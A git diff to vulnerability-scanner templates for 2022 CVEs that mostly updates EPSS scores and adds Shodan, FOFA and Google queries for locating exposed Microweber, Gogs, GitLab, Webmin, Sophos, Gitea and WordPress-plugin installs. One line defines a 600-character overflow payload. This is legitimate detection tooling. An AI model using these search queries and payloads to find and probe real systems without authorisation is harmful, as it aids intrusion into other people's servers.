b/http/cves/2022/CVE-2022-0378.yaml index 415dc9f2b2..3125532a71 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 58ade967dc..f4219bef5e 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -13,19 +13,24 @@ info: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902 - https://nvd.nist.gov/vuln/detail/CVE-2022-0415 + - https://github.com/bfengj/CTF + - https://github.com/cokeBeer/go-cves classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 cwe-id: CWE-434,CWE-20 - epss-score: 0.1488 - epss-percentile: 0.95273 + epss-score: 0.11758 + epss-percentile: 0.95304 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 75d7077c97..257ba52f18 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 4dcbc3f1da..1af717e2a6 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -25,6 +25,8 @@ info: product: popup framework: wordpress publicwww-query: "/wp-content/plugins/popup-by-supsystic" + shodan-query: http.html:/wp-content/plugins/popup-by-supsystic + fofa-query: body=/wp-content/plugins/popup-by-supsystic tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup http: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 3d5c34a880..67424235b5 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 8e17d66054..1ef77cc8fc 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0434 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.90796 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 4afa2716a7..0990ac2f81 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0533 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: ditty framework: wordpress publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ + fofa-query: body=/wp-content/plugins/ditty-news-ticker/ tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations http: diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 43550a1baa..73e28bd17a 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-0597 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.45025 + epss-percentile: 0.45018 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,microweber,redirect,oss http: diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 52049ee911..64051604c8 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index aa5b02be47..2535aa5cd5 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0651 cwe-id: CWE-89 - epss-score: 0.34697 - epss-percentile: 0.96721 + epss-score: 0.26955 + epss-percentile: 0.96764 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,9 @@ info: product: wp_statistics framework: wordpress google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 93b3090e9e..4c48aa7965 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0653 cwe-id: CWE-79 epss-score: 0.00206 - epss-percentile: 0.58596 + epss-percentile: 0.58565 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 62d781c125..e985446a6a 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-0656 cwe-id: CWE-552 - epss-score: 0.00684 - epss-percentile: 0.77939 + epss-score: 0.00658 + epss-percentile: 0.79479 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 49fdf094e6..d9e1a4f4a5 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0658 cwe-id: CWE-89 epss-score: 0.04032 - epss-percentile: 0.91879 + epss-percentile: 0.92073 cpe: cpe:2.3:a:wielebenwir:commonsbooking:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 03acf180ab..f465933e02 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -29,6 +29,8 @@ info: max-request: 2 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,microweber,disclosure,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 4051acee76..1bdae5b3d5 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0678 cwe-id: CWE-79 epss-score: 0.00138 - epss-percentile: 0.48373 + epss-percentile: 0.49247 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index f97e9ea796..6907b96a3e 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0692 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 0b20732236..8d2bd3a882 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 - epss-score: 0.02977 - epss-percentile: 0.89892 + epss-score: 0.02367 + epss-percentile: 0.89814 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 77a0f51995..63d351902a 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-0735 cwe-id: CWE-863 epss-score: 0.03278 - epss-percentile: 0.90347 + epss-percentile: 0.91282 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4d0a4c9d12..615f112b9e 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0747 cwe-id: CWE-89 epss-score: 0.02705 - epss-percentile: 0.90254 + epss-percentile: 0.90483 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 946b65bd33..1d069ca3aa 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.02977 - epss-percentile: 0.90654 + epss-score: 0.02367 + epss-percentile: 0.89814 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index a37ad7c9da..931bfa16ab 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0776 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* metadata: vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 8709b871e8..9d9eb411b4 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0781 cwe-id: CWE-89 - epss-score: 0.01147 - epss-percentile: 0.84479 + epss-score: 0.01278 + epss-percentile: 0.85709 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 4668acfa74..3073a46d3b 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0786 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04043 + epss-percentile: 0.92087 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 4ec0f01939..168f458082 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0787 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 14840b8a0e..948e02ad78 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -27,6 +27,8 @@ info: product: ubigeo_de_peru_para_woocommerce framework: wordpress publicwww-query: "/wp-content/plugins/ubigeo-peru/" + shodan-query: http.html:/wp-content/plugins/ubigeo-peru/ + fofa-query: body=/wp-content/plugins/ubigeo-peru/ tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project http: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index e75bdc7c5f..262e62b79d 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0817 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index afa8ea4368..ae695e1fd7 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: webmin product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2022,rce,oss,huntr,webmin,authenticated http: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index aa257071fd..7e7f384310 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-video-gallery-free/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0826 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0826 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.92143 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 53e37f1b72..3763e4c54c 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0827 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.91467 + epss-score: 0.04043 + epss-percentile: 0.92087 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 6a02a3fcdb..27deefaff5 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0846 cwe-id: CWE-89 - epss-score: 0.03633 - epss-percentile: 0.90796 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 30efd2cb82..e932178228 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -29,7 +29,7 @@ info: vendor: updraftplus product: updraftplus framework: wordpress - tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,updraftplus + tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress http: - raw: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index d3c373eaf1..180e5f5564 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0869 cwe-id: CWE-601 epss-score: 0.00115 - epss-percentile: 0.4417 + epss-percentile: 0.45018 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index c7fb438fed..d01307aa57 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -28,6 +28,9 @@ info: max-request: 4 vendor: gogs product: gogs + google-query: intitle:"sign in - gogs" + shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 4a3c0ebcce..feaf9c8580 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -23,6 +23,7 @@ info: vendor: draftpress product: header_footer_code_manager framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress http: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 2c2122562b..1343c036b1 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -14,19 +14,23 @@ info: - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a - https://nvd.nist.gov/vuln/detail/CVE-2022-0928 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0928 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50156 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,authenticated,huntr,xss,microweber,cms http: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index e0491bf17d..b782b6673e 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 - epss-score: 0.04043 - epss-percentile: 0.91894 + epss-score: 0.04032 + epss-percentile: 0.92073 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 5eeef53133..f5d82c6ace 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50222 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve2022,cve,xss,microweber,huntr http: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index e2a7395a63..8a414bcd31 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50156 + epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 952a5dd550..e1cd0ce752 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,overflow,microweber,cms,huntr variables: payload: '{{repeat("A", 600)}}' diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index fe8e001610..10fe21c738 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-1007 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 4d896dbd25..65b0a76af7 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.88685 + epss-score: 0.0161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index e304c7bb7c..1a32971ded 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -30,6 +30,8 @@ info: vendor: sophos product: sfos shodan-query: http.title:"Sophos" + fofa-query: title="sophos" + google-query: intitle:"sophos" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev http: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index dbbbdd83c4..b2992c6265 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00292 - epss-percentile: 0.68538 + epss-percentile: 0.69101 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index e9688f5fbb..015a580b7a 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 - epss-score: 0.05057 - epss-percentile: 0.92729 + epss-score: 0.03633 + epss-percentile: 0.9168 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 9444a2cfef..a35a6bb80a 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -28,6 +28,8 @@ info: vendor: gitea product: gitea shodan-query: title:"Gitea" + fofa-query: body="powered by gitea version" + google-query: intitle:"gitea" tags: cve,cve2022,huntr,open-redirect,gitea http: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 1deaf81022..a8263c468e 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - epss-score: 0.42222 - epss-percentile: 0.97228 + epss-score: 0.41577 + epss-percentile: 0.97306 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 6ad9ef2ab1..093c630c29 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -27,6 +27,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab,packetstorm http: diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 70083869b4..6bff99bdc1 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -25,6 +25,8 @@ info: product: jobmonster framework: wordpress publicwww-query: "/wp-content/themes/noo-jobmonster" + shodan-query: http.html:/wp-content/themes/noo-jobmonster + fofa-query: body=/wp-content/themes/noo-jobmonster tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme http: diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 63d246697b..e93c59929b 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42899 + epss-percentile: 0.43227 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 17873ed3b5..d3bc4fa709 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-1329 - cwe-id: CWE-862,CWE-434 - epss-score: 0.96079 - epss-percentile: 0.99457 + 